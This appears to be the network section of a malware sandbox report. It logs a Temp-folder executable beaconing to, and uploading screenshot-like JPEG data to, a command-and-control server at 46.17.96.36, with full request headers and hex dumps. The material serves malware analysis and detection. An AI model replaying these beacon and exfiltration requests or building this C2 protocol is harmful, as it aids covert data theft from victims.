                                        Aug 29, 2021 22:29:06.121136904 CEST18481OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:06.121397018 CEST18492OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:06.121476889 CEST18494OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:06.156353951 CEST18497OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:06.156585932 CEST18500OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:06.156620979 CEST18503OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:29:06.156642914 CEST18510OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:06.156845093 CEST18515OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:29:06.156948090 CEST18520OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:06.193382978 CEST18523OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:06.301801920 CEST18590INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        311192.168.2.45005046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:06.410758018 CEST18591OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:06.491009951 CEST18591INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:29:06.668040037 CEST18592OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:06.668134928 CEST18592OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:06.668294907 CEST18602OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:06.668415070 CEST18605OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:06.700967073 CEST18613OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:06.701040030 CEST18618OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:06.701117992 CEST18626OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:29:06.701190948 CEST18631OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:29:06.733958006 CEST18635OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:29:06.734024048 CEST18645OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:29:06.734199047 CEST18659OUTData Raw: f4 30 5a ff 00 df 86 ff 00 1a ab 79 f0 27 55 b5 88 14 d6 ad a6 91 c9 58 d0 42 c3 73 05 2d 8c 93 c7 dd af 6f ff 00 84 93 42 ff 00 a0 d6 9d ff 00 81 49 fe 35 4f 50 d7 b4 a9 12 06 b6 d5 f4 b7 92 29 77 ed 7b d4 50 46 d6 5e bc fa fa 54 f3 57 ec fe e2
                                        Data Ascii: 0Zy'UXBs-oBI5OP)w{PF^TWCl"xn"m9^C2,sV<ge8(O5[WvM5hZ(5hIadK7szY9Q h4s0Dhapi}P(
                                        Aug 29, 2021 22:29:06.852529049 CEST18700INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        312192.168.2.45005146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:06.709253073 CEST18632OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:06.786432981 CEST18700INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        313192.168.2.45005246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:07.041423082 CEST18701OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:07.126326084 CEST18702INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        314192.168.2.45005346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:07.256577969 CEST18702OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:07.256655931 CEST18702OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:07.256782055 CEST18712OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:07.256865978 CEST18715OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:07.293808937 CEST18718OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:07.293874025 CEST18721OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:07.293886900 CEST18724OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:29:07.293903112 CEST18729OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:07.294059992 CEST18732OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:29:07.294235945 CEST18736OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:29:07.294264078 CEST18741OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:07.441014051 CEST18812INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        315192.168.2.45005446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:07.333308935 CEST18792OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:07.404371977 CEST18812INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        316192.168.2.45005546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:07.641004086 CEST18813OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:07.722687960 CEST18813INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:29:07.944303036 CEST18813OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:07.944365025 CEST18813OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
